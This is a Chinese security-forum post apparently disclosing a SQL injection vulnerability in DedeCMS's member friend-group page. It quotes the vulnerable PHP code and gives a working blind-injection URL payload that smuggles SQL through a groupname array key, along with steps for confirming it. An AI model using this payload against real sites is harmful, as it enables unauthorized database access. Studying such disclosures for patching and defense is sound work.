查看: 12771|回复: 1

Dedecms 会员中心注入漏洞10

[复制链接]
  • TA的每日心情
    开心
    2017-1-9 18:10
  • 签到天数: 2 天

    [LV.1]初来乍到

    发表于 2014-2-28 03:11:47 | 显示全部楼层 |阅读模式
    [AppleScript] 纯文本查看 复制代码
    <pre><code>member/myfriend_group.php
    }elseif ($dopost == 'save'){
        if(isset($mtypeidarr) &amp;&amp; is_array($mtypeidarr))
        {
            $delids = '0';
            $mtypeidarr = array_filter($mtypeidarr, 'is_numeric');
            foreach($mtypeidarr as $delid)
            {
                $delids .= ','.$delid;
                unset($groupname[$delid]);
            }
            $query = "DELETE FROM `#@__member_group` WHERE id in ($delids) AND 
     
    mid='$cfg_ml-&gt;M_ID'";
            $dsql-&gt;ExecNoneQuery($query);
            $sql="SELECT id FROM `#@__member_friends` WHERE groupid in 
     
    ($delids) AND mid='$cfg_ml-&gt;M_ID'";
            $db-&gt;SetQuery($sql);
            $db-&gt;Execute();
            while($row = $db-&gt;GetArray())
            {
                $query2 = "UPDATE `#@__member_friends` SET groupid='1' WHERE 
     
    id='{$row['id']}' AND mid='$cfg_ml-&gt;M_ID'";
                $dsql-&gt;ExecNoneQuery($query2);
            }
        }
        foreach ($groupname as $id =&gt; $name)//遍历key和value 和之前一个诸如一样
        {
            $name = HtmlReplace($name);
            $query = "UPDATE `#@__member_group` SET groupname='$name' WHERE 
     
    id='$id' AND mid='$cfg_ml-&gt;M_ID'";
            echo $query;
            $dsql-&gt;ExecuteNoneQuery($query);
        }
        ShowMsg('分组修改完成(删除分组中的会员会转移到默认分组
     
    中)','myfriend_group.php');
    }</code></pre>

    漏洞证明:

    利用方法

    先打开127.0.0.1/dede/member/myfriend_group.php随便添加一个

    然后看源码里groupname[]中的值

    因为没有返回 只能盲注

    那么判断是否满足条件就看是否update了原来的数据

    这样就easy 执行一下语句

    127.0.0.1/dede/member/myfriend_group.php?dopost=save&groupname[3' or @`'`

    and (select 1)%3D1 and '1]=12222

    如果(select 1)=1的话 那个groupname就会被改成12222

    上面的3改成你的groupname的ID就哦了
    1111111111111111111.jpg
    22222222222222222.jpg
    测试前
    33333333333333.jpg
    测试后
    4444444444.jpg
    回复

    使用道具 举报

  • TA的每日心情
    擦汗
    2017-6-6 13:33
  • 签到天数: 53 天

    [LV.5]常住居民I

    发表于 2014-2-28 19:14:09 | 显示全部楼层
    这是连载的节奏啊
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-27 21:00 , Processed in 0.025062 second(s), 15 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部